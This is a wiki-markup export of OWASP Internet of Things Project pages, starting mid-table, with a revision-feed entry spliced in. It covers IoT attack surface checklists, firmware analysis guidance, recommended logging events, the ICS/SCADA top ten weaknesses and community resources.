* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* Allows people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Ensure supported and up-to-date software is used by developers<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file systems for sensitive of interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general are not logging nearly enough events to constitute input for a solid detection and response program around IoT devices, and for companies that want to do this there are not many good resources for what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
=ICS/SCADA=<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
==ICS/SCADA Project==<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
{| class="wikitable" border="1" style="text-align: left"<br />
!Rank and ID<br />
!Title<br />
|-<br />
|'''1 - CWE-119'''<br />
|<br />
*Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|-<br />
|'''2 - CWE-20'''<br />
|<br />
*Improper Input Validation<br />
|-<br />
|'''3 - CWE-22'''<br />
|<br />
*Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
|'''4 - CWE-264'''<br />
|<br />
*Permissions, Privileges, and Access Controls<br />
|-<br />
|'''5 - CWE-200'''<br />
|<br />
*Information Exposure<br />
|-<br />
|'''6 - CWE-255'''<br />
|<br />
*Credentials Management<br />
|-<br />
|'''7 - CWE-287'''<br />
|<br />
*Improper Authentication<br />
|-<br />
|'''8 - CWE-399'''<br />
|<br />
*Resource Management Errors<br />
|-<br />
|'''9 - CWE-79'''<br />
|<br />
*Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|-<br />
|'''10 - CWE-189'''<br />
|<br />
*Numeric Errors<br />
|-<br />
|}{{Social Media Links}}<br />
| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |<br />
==What is the ICS/SCADA Project?==<br />
The ICS/SCADA Project provides:<br />
*A list of the Top 10 most dangerous software weaknesses<br />
==Project Leaders==<br />
*NJ Ouchn<br />
==Related Projects==<br />
*[[OWASP Mobile Security Project|OWASP Mobile Security]]<br />
*[[OWASP Top Ten Project|OWASP Web Top 10]]<br />
==Collaboration==<br />
[https://owasp-iot-security.slack.com/ The Slack Channel]<br />
==Quick Download==<br />
*Coming Soon<br />
==News and Events==<br />
*Coming Soon<br />
|}<br />
<br />
= IoTGoat =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoTGoat Project ==<br />
<br />
Details coming soon. For information on how to get started with contributing, see the "Project Task List" in the download section. <br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoTGoat Project? ==<br />
<br />
The IoTGoat Project is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the IoT Top 10.<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
* Fotios Chantzis<br />
* Paulino Calderon<br />
<br />
== Related Projects ==<br />
<br />
* WebGoat<br />
* Serverless Goat<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* [https://docs.google.com/presentation/d/1SJfabCBxvC3GWnmBCqisO5pyLzkB1-EVcR7s8baT0dE/edit?usp=sharing Project Kick-off Slides]<br />
* [https://strozfriedberg.webex.com/recordingservice/sites/strozfriedberg/recording/playback/5529b228ac514bed8cc050a9dee0f0df Project Kick-off Meeting]<br />
* [https://docs.google.com/spreadsheets/d/1KXX2K7ikkve6wmdfAVu-sZONgKEBuAkRij_paJUgX2w/edit?usp=sharing Project Task List]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;"></div><br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is global organization supported by over 100 organizations headquartered in Bellevue, Washington with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance, established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long- term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane]<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=248642OWASP Internet of Things Project2019-03-12T03:21:39Z<p>Aaron.guzman: /* News and Events */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has been released![[File:OWASP 2018 IoT Top10 Final.jpg|center|thumb|1301x1301px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/ SCADA,etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Levy-Bencheotn<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
